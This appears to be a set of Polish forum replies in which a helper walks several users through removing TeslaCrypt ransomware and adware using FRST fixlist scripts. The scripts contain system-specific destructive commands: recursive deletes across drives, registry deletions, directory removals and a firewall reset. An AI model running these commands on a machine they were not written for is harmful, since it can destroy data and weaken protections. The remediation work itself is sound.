System32\Tasks\{66032DC2-09DF-4A4C-9CC3-1A91EB84026C} => pcalua.exe -a "C:\Users\Trojanus\AppData\Roaming\Easeware\DriverEasy\drivers\5n2sqgxe.bu2\chipset INFs\chipset INFs\Ssetup.exe" -d "C:\Users\Trojanus\AppData\Roaming\Easeware\DriverEasy\drivers\5n2sqgxe.bu2\chipset INFs\chipset INFs" Task: {FE0517B4-3656-4494-A035-EB02F49F584F} - System32\Tasks\{1062DC1F-7054-4423-BC53-8E51404F9AD5} => pcalua.exe -a C:\Users\Trojanus\AppData\Roaming\Easeware\DriverEasy\drivers\rgqlscqm.1bd\setup.exe -d C:\Users\Trojanus\AppData\Roaming\Easeware\DriverEasy\drivers\rgqlscqm.1bd C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\ProgramData\MWMiniProM C:\Users\Trojanus\AppData\Roaming\istartsurf C:\Users\Trojanus\AppData\Roaming\WarThunder C:\Users\Trojanus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk C:\Users\Trojanus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder.lnk C:\Users\Trojanus\Downloads\*-dp*.exe C:\Users\Trojanus\Downloads\setup.exe C:\Windows\System32\drivers\{6fcd6092-9615-4f7f-8898-8df53980e5d2}Gw.sys Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść Firefox z adware: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Trojanus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Ale nie tylko Twoje osobiste pliki są zaszyfrowane, ale też pliki Windows i programów. Kopiowanie wszystkiego na inny dysk zajmie dużo czasu, a zadbanie o zaszyfrowane pliki Windows i programów to jakaś straszna robota, musiałbyś je po kolei wstawiać do odpowiednich miejsc... I na razie dokładnie sprzątam, by dekoder nie zajmował się nieistotnymi plikami aplikacji odinstalowanych. Prawie wszystko wykonane, ale wystąpił problem z deinstalacją paska AVG. A przeprowadzone czynności zwiększyły ilość miejsca na dysku: Drive c: () (Fixed) (Total:68.36 GB) (Free:9.18 GB) NTFS ==>[dysk z komponentami startowymi (Windows XP)] Prawdopodobnie miejsca się jeszcze znajdzie trochę, bo są kolejne poprawki. Otwórz Notatnik i wklej w nim: () C:\Program Files\AVG Secure Search\vprot.exe S4 sptd; C:\WINDOWS\System32\Drivers\sptd.sys [691696 2011-05-27] (Duplex Secure Ltd.) S4 desksvc; C:\Program Files\Desk 365\deskSvc.exe [X] S2 VideoDownloadConverter_4zService; C:\PROGRA~1\VIDEOD~2\bar\1.bin\4zbarsvc.exe [X] S2 vToolbarUpdater18.9.0; "C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.9.0\ToolbarUpdater.exe" [X] HKLM\...\Run: [vProt] => C:\Program Files\AVG Secure Search\vprot.exe [2569616 2015-10-01] () Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\18.9.0\ViProtocol.dll Brak pliku DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\combofix.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AVG Secure Search DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WeatherBlinkbar Uninstall Internet Explorer DeleteKey: HKU\S-1-5-21-484763869-287218729-725345543-500\Software\Microsoft\Windows\CurrentVersion\Uninstall\DSite DeleteKey: HKU\S-1-5-21-484763869-287218729-725345543-500\Software\Microsoft\Windows\CurrentVersion\Uninstall\Mipony Download Manager Packages RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\0D0S1L2Z1P1B0T1P1B2Z RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\Delta RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\DSite RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\Macromedia RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\Malwarebytes RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Dane aplikacji\Mozilla RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Ustawienia lokalne\Dane aplikacji\Google RemoveDirectory: C:\Documents and Settings\Administrator.XXX-8C2238048E0.000\Ustawienia lokalne\Dane aplikacji\Mozilla RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\{01BD4FC9-2F86-4706-A62E-774BB7E9D308} RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Alwil Software RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\AVG RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\AVG2013 RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Avg_Update_0814tb RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Babylon RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\DAEMON Tools Lite RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\GARMIN RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Malwarebytes RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\McAfee RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\NOS RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\PC Tools RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Sun RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Tarma Installer RemoveDirectory: C:\Documents and Settings\All Users\Dane aplikacji\Wru RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\ABBYY RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\ACD Systems RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\AVG RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\AVG Secure Search RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\AVG2013 RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\DAEMON Tools Lite RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\Gadu-Gadu RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\GARMIN RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\GoPlayer RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\ImgBurn RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\Macromedia RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\Malwarebytes RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\OpenCandy RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\Opera Software RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\PerformerSoft RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\Sun RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\Systweak RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\TuneUp Software RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\uTorrent RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\WeatherBlink RemoveDirectory: C:\Documents and Settings\Ja\Dane aplikacji\WebCompiler3 RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\ABBYY RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\APN RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Apple Computer RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\AVG Secure Search RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Avg2013 RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Avg2014 RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\avgchrome RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\IAC RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\MFAData RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Opera Software RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\SlimWare Utilities Inc RemoveDirectory: C:\Documents and Settings\Ja\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Extensions\hgojaaaiddhmiiakpejiklijbalpckih RemoveDirectory: C:\Documents and Settings\Ja\Pulpit\Stare dane programu Firefox RemoveDirectory: C:\Program Files\Common Files\337 RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Kaspersky Rescue Disk 10.0 RemoveDirectory: C:\Program Files\Adobe\Acrobat_com RemoveDirectory: C:\Program Files\ACD Systems RemoveDirectory: C:\Program Files\Alwil Software RemoveDirectory: C:\Program Files\Audiograbber RemoveDirectory: C:\Program Files\AVG Secure Search RemoveDirectory: C:\Program Files\AVG Security Toolbar RemoveDirectory: C:\Program Files\GUM21.tmp RemoveDirectory: C:\Program Files\GUM2A.tmp RemoveDirectory: C:\Program Files\GUM39.tmp RemoveDirectory: C:\Program Files\GUMD.tmp RemoveDirectory: C:\Program Files\HotPotatoes6 RemoveDirectory: C:\Program Files\ImgBurn RemoveDirectory: C:\Program Files\Opera RemoveDirectory: C:\Program Files\Pekka Kana 2 RemoveDirectory: C:\Program Files\SkanerOnline RemoveDirectory: C:\Program Files\SlimCleaner RemoveDirectory: C:\Program Files\Winamp Toolbar RemoveDirectory: C:\Program Files\Wru CMD: del /q C:\s0nr0t0o.exe CMD: del /q "C:\Program Files\4zres.dll" CMD: del /q "C:\Program Files\4zUninstall VideoDownloadConverter.dll" CMD: del /q C:\WINDOWS\System32\Drivers\sptd.sys Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie powinno być restartu, ale może się to zdarzyć, jeśli komponenty paska AVG będą zablokowane. Przedstaw wynikowy fixlog.txt.

Sprawa ciężka, to infekcja TeslaCrypt i plików nie da się odkodować. Porównawczo ten temat: KLIK. Ona nadal jest czynna, więc należy ją szybko usunąć. Akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-4141441876-3601026287-570387324-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\wdigest.dll (HP) HKLM\...\Run: [openssl_32] => C:\ProgramData\openssl_32.exe [4096 2015-11-13] () HKU\S-1-5-21-4141441876-3601026287-570387324-1000\...\Run: [GoogleDriveSync] => "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart HKU\S-1-5-21-4141441876-3601026287-570387324-1000\...\Run: [MSConfig] => C:\Users\Dirciak\zedgxlpq.exe [35893248 2015-11-13] (AhnLab, Inc. ) HKU\S-1-5-21-4141441876-3601026287-570387324-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].txt [1548 2015-11-14] () ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => Brak pliku Toolbar: HKU\S-1-5-21-4141441876-3601026287-570387324-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku Task: {2F9A2A64-856A-4724-B2F5-8F05C11FE4FD} - System32\Tasks\{1988B6A2-D827-4FBE-B61E-BA1EA266D630} => K:\KOPIA\INSTALKI\Instalki\winamp534_full_bundle_emusic-7plus.exe Task: {A8EEC877-AE19-460C-8E82-8DBF59C6EB9B} - System32\Tasks\{D5B57EA3-BFDB-44B1-840E-0A3EA1E01545} => K:\KOPIA\INSTALKI\Instalki\winamp534_full_bundle_emusic-7plus.exe Task: {B1A1E647-5CD4-4E27-9486-12B464E4157D} - System32\Tasks\{0520757E-D956-4A88-ACCE-53AF7617EB69} => K:\KOPIA\INSTALKI\Instalki\winamp534_full_bundle_emusic-7plus.exe Task: {C0C4284E-CC7C-4E39-9FD2-282C7813AE64} - System32\Tasks\{BC03A4C7-D76C-4795-AB60-2EBF2C9111C8} => G:\SimCity\SimCity\SimCity.exe S3 gdrv; \??\C:\Windows\gdrv.sys [X] S0 PxHlpa64; System32\Drivers\PxHlpa64.sys [X] U2 V2iMount; Brak ImagePath AlternateDataStreams: C:\Users\Dirciak\Local Settings:init C:\ProgramData\autobk.inc C:\ProgramData\openssl_32.exe C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} C:\Users\Dirciak\zedgxlpq.exe C:\Users\Dirciak\AppData\Roaming\msregsvv.dll C:\Users\Dirciak\AppData\Roaming\update.dat C:\Users\Dirciak\Downloads\SpyHunter 4 Key Generator.rar Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f CMD: netsh advfirewall reset CMD: attrib -r -h -s C:\howto_recover_file* /s CMD: attrib -r -h -s D:\howto_recover_file* /s CMD: attrib -r -h -s E:\howto_recover_file* /s CMD: attrib -r -h -s G:\howto_recover_file* /s CMD: attrib -r -h -s H:\howto_recover_file* /s CMD: attrib -r -h -s I:\howto_recover_file* /s CMD: attrib -r -h -s K:\howto_recover_file* /s CMD: attrib -r -h -s R:\howto_recover_file* /s CMD: attrib -r -h -s T:\howto_recover_file* /s CMD: attrib -r -h -s W:\howto_recover_file* /s CMD: del /q /s C:\howto_recover_file* CMD: del /q /s D:\howto_recover_file* CMD: del /q /s E:\howto_recover_file* CMD: del /q /s G:\howto_recover_file* CMD: del /q /s H:\howto_recover_file* CMD: del /q /s I:\howto_recover_file* CMD: del /q /s K:\howto_recover_file* CMD: del /q /s R:\howto_recover_file* CMD: del /q /s T:\howto_recover_file* CMD: del /q /s W:\howto_recover_file* EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Fix może się długo wykonywać ze względu na rekursywne usuwanie wszystkich wystąpień howto_recover_file* z wszystkich dysków. 2. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. On będzie baaaardzo duży, więc spakuj do ZIP, shostuj gdzieś i podaj link do paczki.

Teraz jest dobry czas na gruntowną modernizację układu, więc instalacja Windows 7 jak najbardziej na miejscu. Instalacja nie jest trudniejsza niż instalacja XP. W razie czego służę pomocą.

DelFix dokasował drobne szczątki. Usuń plik C:\delfix.txt. Temat rozwiązany. Zamykam. I wielkie dzięki za "wyjazd na Kapelankę"!

Infekcja szyfrująca nie jest czynna, ale zanim zabierzesz się za odkodowanie plików, posprzątajmy, bo system jest mocno zaśmiecony: Avast został zablokowany przez malware na bazie polityk oprogramowania, są nadal aktywne różne obiekty adware oraz kupa odpadkowych śmieci. Akcje do przeprowadzenia: 1. Był uruchamiany GMER, więc upewnij się, że transfer dysku się nie obniżył do PIO, co bardzo utrudniłoby późniejsze operacje dekodera. Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. 2. Przez Dodaj/Usuń programy odinstaluj: - Stare wersje i zbędniki: ABBYY FineReader 5.0 Sprint, ABBYY FineReader 6.0, Acrobat.com, Adobe AIR, AVG Security Toolbar, Java™ 6 Update 31, Java™ 6 Update 6, Java™ 6 Update 7, McAfee Security Scan Plus, OpenOffice.org Installer 1.0, Real Alternative 1.8.0 - Adware/PUP: Delta Chrome Toolbar, Desk 365, FlvPlayer, MiPony 2.0.2, Mipony Download Manager Packages, Smiley Bar for Facebook, Update for Mipony Download Manager, VideoDownloadConverter Internet Explorer Toolbar, WeatherBlink Internet Explorer Toolbar, WebCake 3.00, Winamp Toolbar for Internet Explorer. Jeśli coś nie będzie widoczne lub zgłosi błąd, kontynuuj dalej. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM Group Policy restriction on software: C:\Program Files\AVAST Software HKLM Group Policy restriction on software: C:\Program Files\Alwil Software HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k HKU\S-1-5-21-484763869-287218729-725345543-1003\...\Run: [NokiaPCInternetAccess] => "C:\Program Files\Nokia\PC Internet Access\NPCIA.exe" /b HKU\S-1-5-21-484763869-287218729-725345543-500\...\RunOnce: [Del450640] => cmd.exe /Q /D /c del "C:\DOCUME~1\ADMINI~1.000\USTAWI~1\Temp\0.del" Winlogon\Notify\WgaLogon: WgaLogon.dll [X] Task: C:\WINDOWS\Tasks\EPUpdater.job => C:\DOCUME~1\ADMINI~1.000\DANEAP~1\BABSOL~1\Shared\BabMaint.exe BootExecute: autocheck autochk * aswBoot.exe /M:29cec3ea4378 /dir:C:\Program S3 ADIHdAudAddService; system32\drivers\ADIHdAud.sys [X] S3 AEAudio; system32\drivers\AEAudio.sys [X] S3 catchme; \??\C:\DOCUME~1\Ja\USTAWI~1\Temp\catchme.sys [X] S3 CtClsFlt; system32\DRIVERS\CtClsFlt.sys [X] S3 EverestDriver; \??\C:\Documents and Settings\Ja\Pulpit\everestultimate_build_1066\kerneld.wnt [X] S3 GMSIPCI; \??\E:\INSTALL\GMSIPCI.SYS [X] S3 SenFiltService; system32\drivers\Senfilt.sys [X] ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => Brak pliku CustomCLSID: HKU\S-1-5-21-484763869-287218729-725345543-1003_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Documents and Settings\Ja\Dane aplikacji\Dropbox\bin\Dropbox.exe /autoplay => Brak pliku CustomCLSID: HKU\S-1-5-21-484763869-287218729-725345543-1003_Classes\CLSID\{039B2CA5-3B41-4D93-AD77-47D3293FC5CB}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-484763869-287218729-725345543-1003_Classes\CLSID\{42481700-CF3C-4D05-8EC6-F9A1C57E8DC0}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-484763869-287218729-725345543-1003_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-484763869-287218729-725345543-1003_Classes\CLSID\{E69341A3-E6D2-4175-B60C-C9D3D6FA40F6}\localserver32 -> C:\Documents and Settings\Ja\Dane aplikacji\Dropbox\bin\Dropbox.exe /wiacallback => Brak pliku StartMenuInternet: chrome.exe - C:\Program Files\Google\Chrome\Application\chrome.exe hxxp://www.22find.com/?utm_source=b&utm_medium=501&from=501&uid=SAMSUNGXHD252HJ_S17HJ9DQ402510&ts=1359556452 CHR StartupUrls: Default -> "hxxp://kl.startnow.com/?src=startpage&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=876&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.5.0&install_country=PL&install_date=20130208&user_guid=9ABB1EEF6AF84127A188AA841AE180F6&machine_id=f17123d12604361b6e951b71ec099dee&browser=CR&os=win&os_version=5.1-x86-SP2" FF Session Restore: -> [funkcja włączona] FF Plugin: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files\Common Files\AVG Secure Search\SiteSafetyInstaller\18.9.0\\npsitesafety.dll [brak pliku] FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2012-02-25] (Sun Microsystems, Inc.) FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.0.318\npMcAfeeMss.dll [2013-02-05] (McAfee, Inc.) FF Plugin: @real.com/nppl3260;version=6.0.11.2852 -> C:\Program Files\Real Alternative\browser\plugins\nppl3260.dll [2008-04-28] (RealNetworks, Inc.) FF Plugin: @real.com/nppl3260;version=6.0.12.46 -> C:\Program Files\Real Alternative\browser\plugins\nppl3260.dll [2008-04-28] (RealNetworks, Inc.) FF Plugin: @real.com/nprpjplug;version=6.0.12.1662 -> C:\Program Files\Real Alternative\browser\plugins\nprpjplug.dll [2008-04-28] (RealNetworks, Inc.) FF Plugin: @real.com/nprpjplug;version=6.0.12.46 -> C:\Program Files\Real Alternative\browser\plugins\nprpjplug.dll [2008-04-28] (RealNetworks, Inc.) FF Plugin: @VideoDownloadConverter_4z.com/Plugin -> C:\Program Files\VideoDownloadConverter_4z\bar\1.bin\NP4zStub.dll [2014-04-05] (Mindspark) FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff FF HKLM\...\Firefox\Extensions: [statuswinks@StatusWinks] - C:\Documents and Settings\Ja\Dane aplikacji\Mozilla\Extensions\statuswinks@StatusWinks FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF HKU\S-1-5-21-484763869-287218729-725345543-1003\...\Firefox\Extensions: [statuswinks@StatusWinks] - C:\Documents and Settings\Ja\Dane aplikacji\Mozilla\Extensions\statuswinks@StatusWinks HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-484763869-287218729-725345543-1003\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com HKU\S-1-5-21-484763869-287218729-725345543-1003\Software\Microsoft\Internet Explorer\Main,bProtector Start Page = hxxp://www.delta-search.com/?affID=121845&babsrc=HP_ss&mntrId=7012A0F3C1320345 HKU\S-1-5-21-484763869-287218729-725345543-1003\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie HKU\S-1-5-21-484763869-287218729-725345543-1003\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie HKU\S-1-5-21-484763869-287218729-725345543-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.delta-search.com/?affID=121845&babsrc=HP_ss&mntrId=7012A0F3C1320345 HKU\S-1-5-21-484763869-287218729-725345543-500\Software\Microsoft\Internet Explorer\Main,bProtector Start Page = hxxp://www.delta-search.com/?affID=121845&babsrc=HP_ss&mntrId=7012A0F3C1320345 URLSearchHook: HKU\S-1-5-21-484763869-287218729-725345543-1003 - (Brak nazwy) - {93a3111f-4f74-4ed8-895e-d9708497629e} - Brak pliku URLSearchHook: [s-1-5-21-484763869-287218729-725345543-500] UWAGA => Brak domyślnego URLSearchHook SearchScopes: HKLM -> DefaultScope {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm073^YYA^pl&si=pconvIE&ptb=B3C08734-4B05-4A09-A3F8-9B80B65B6874&ind=2014040507&n=780bd1bb&psa=&st=sb&searchfor={searchTerms} SearchScopes: HKLM -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://startsear.ch/?aff=1&src=sp&cf=658f9106-3646-11e1-a41e-001d92fcc647&q={searchTerms} SearchScopes: HKLM -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm073^YYA^pl&si=pconvIE&ptb=B3C08734-4B05-4A09-A3F8-9B80B65B6874&ind=2014040507&n=780bd1bb&psa=&st=sb&searchfor={searchTerms} SearchScopes: HKLM -> {EEE6C360-6118-11DC-9C72-001320C79847} URL = hxxp://search.sweetim.com/search.asp?src=6&q={searchTerms} SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> DefaultScope {B224AA02-F7C8-3A2B-859F-560B80767E4A} URL = hxxp://kl.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=876&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.5.0&install_country=PL&install_date=20130208&user_guid=9ABB1EEF6AF84127A188AA841AE180F6&machine_id=f17123d12604361b6e951b71ec099dee&browser=IE&os=win&os_version=5.1-x86-SP2&iesrc={referrer:source} SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {043C5167-00BB-4324-AF7E-62013FAEDACF} URL = hxxp://vshare.toolbarhome.com/search.aspx?q={searchTerms}&srch=dsp SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=118722&tt=0313_3&babsrc=SP_ss&mntrId=7012dd250000000000008c89a56842bf SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://search.22find.com/web/?utm_source=b&utm_medium=501&from=501&uid=SAMSUNGXHD252HJ_S17HJ9DQ402510&ts=1359556467 SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {AD22EBAF-0D18-4fc7-90CC-5EA0ABBE9EB8} URL = hxxp://www.daemon-search.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {AE18CCFC-EB56-403E-988D-63288173B42F} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=SPC2&o=15000&src=crm&q={searchTerms}&locale=en_US&apn_ptnrs=PV&apn_dtid=YYYYYYYYPL&apn_uid=75f87e41-f4b0-4882-91da-0be8bf89eb67&apn_sauid=EC6FC408-320B-4E88-91F9-250DCC496F21 SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {B224AA02-F7C8-3A2B-859F-560B80767E4A} URL = hxxp://kl.startnow.com/s/?q={searchTerms}&src=defsearch&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=876&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.5.0&install_country=PL&install_date=20130208&user_guid=9ABB1EEF6AF84127A188AA841AE180F6&machine_id=f17123d12604361b6e951b71ec099dee&browser=IE&os=win&os_version=5.1-x86-SP2&iesrc={referrer:source} SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm073^YYA^pl&si=pconvIE&ptb=B3C08734-4B05-4A09-A3F8-9B80B65B6874&ind=2014040507&n=780bd1bb&psa=&st=sb&searchfor={searchTerms} SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {EEE6C360-6118-11DC-9C72-001320C79847} URL = hxxp://search.sweetim.com/search.asp?src=6&q={searchTerms} SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> {F2B5AF9F-1C92-4912-9D12-B96FB65BA847} URL = hxxp://search.babylon.com/?q={searchTerms}&AF=108603&babsrc=SP_ss&mntrId=7012dd25000000000000001d92fcc647 SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-500 -> bProtectorDefaultScope {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} SearchScopes: HKU\S-1-5-21-484763869-287218729-725345543-500 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://www.delta-search.com/?q={searchTerms}&affID=121845&babsrc=SP_ss&mntrId=7012A0F3C1320345 BHO: Brak nazwy -> {c547c6c2-561b-4169-a2a5-20ba771ca93b} -> Brak pliku Toolbar: HKU\S-1-5-21-484763869-287218729-725345543-1003 -> Brak nazwy - {32099AAC-C132-4136-9E9A-4E364A424E17} - Brak pliku DPF: {31435657-9980-0010-8000-00AA00389B71} hxxp://download.microsoft.com/download/e/2/f/e2fcec4b-6c8b-48b7-adab-ab9c403a978f/wvc1dmo.cab DPF: 